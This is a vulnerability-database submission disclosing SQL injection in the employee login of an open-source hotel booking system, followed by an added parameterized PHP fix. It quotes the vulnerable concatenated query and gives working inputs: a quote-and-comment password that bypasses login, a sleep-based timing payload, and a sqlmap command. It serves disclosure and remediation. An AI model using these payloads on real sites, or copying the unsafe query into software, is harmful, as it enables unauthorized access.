Submit #42880: SQL injection in Online-Booking-And-Hotel-Management-System
Information

Title: SQL injection in Online-Booking-And-Hotel-Management-System
Description: In file "login.php", line 50:

```
$Email=$_POST['email'];
$pass=$_POST['pass'];
$query="SELECT * FROM `employees` WHERE email='$Email'AND mep_password='$pass'";
$runQuery=mysqli_query($conn,$query);
$rowQuery= mysqli_num_rows($runQuery);
```

Close with <'#>, so sending a POST request like "[email protected]&pass=admin'#" can successfully log in. Try WAITFOR DELAY injection: POST "[email protected]&pass=admin' and sleep(5)#". The page successfully delayed the response by 5 seconds. Try more attacks with <python sqlmap.py -u "xxx/Online-Booking-And-Hotel-Management-System/admin/login.php" --data="[email protected]&pass=admin">
Source: ⚠️ https://github.com/Rifatur/Online-Booking-And-Hotel-Management-System
User: binghuang (UID 30681)
Submission: 05/08/2022 10:25 AM (4 years ago)
Moderation: 05/08/2022 12:38 PM (2 hours later)
Status: Accepted
VulDB Entry: 205657 [Rigatur Online Booking and Hotel Management System aff6409 POST Request login.php email/pass SQL injection]
Points: 20
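
The query in the description is built by concatenating `$_POST` values into the SQL string. The following is an added example of a parameterized replacement; it is not code from the submission or from the project. Assumptions: `$conn` is the open mysqli connection used by the page's snippet, the function name `authenticate_employee` is hypothetical, and `mep_password` is assumed to store a `password_hash()` value (the original compares the raw password, so stored passwords would need migrating).

```php
<?php
declare(strict_types=1);

/**
 * Added example (hypothetical helper, not project code).
 * Looks up the employee by e-mail with a bound parameter and verifies
 * the password in PHP rather than inside the SQL text.
 */
function authenticate_employee(mysqli $conn, string $email, string $pass): bool
{
    // The placeholder keeps user input out of the SQL text, so quotes and
    // comment characters in $email are handled as data, not as syntax.
    $stmt = $conn->prepare(
        'SELECT mep_password FROM `employees` WHERE email = ? LIMIT 1'
    );
    if ($stmt === false) {
        return false; // prepare failed (non-exception error mode)
    }
    $stmt->bind_param('s', $email);
    if (!$stmt->execute()) {
        $stmt->close();
        return false;
    }
    $stmt->bind_result($storedHash);
    $found = $stmt->fetch(); // true on a row, null when no row matched
    $stmt->close();

    // Assumption: mep_password holds a password_hash() value.
    return $found === true
        && is_string($storedHash)
        && password_verify($pass, $storedHash);
}

// Call site for login.php; runs only when the page's $conn exists.
if (isset($conn) && ($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    $email = $_POST['email'] ?? '';
    $pass  = $_POST['pass'] ?? '';
    // Reject array-valued parameters before they reach the query layer.
    if (!is_string($email) || !is_string($pass)
        || !authenticate_employee($conn, $email, $pass)) {
        http_response_code(401);
        exit('Invalid credentials');
    }
}
```

With this change the password never appears in the SQL statement, so a value such as the `admin'#` string from the description is only compared against the stored hash and fails verification.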
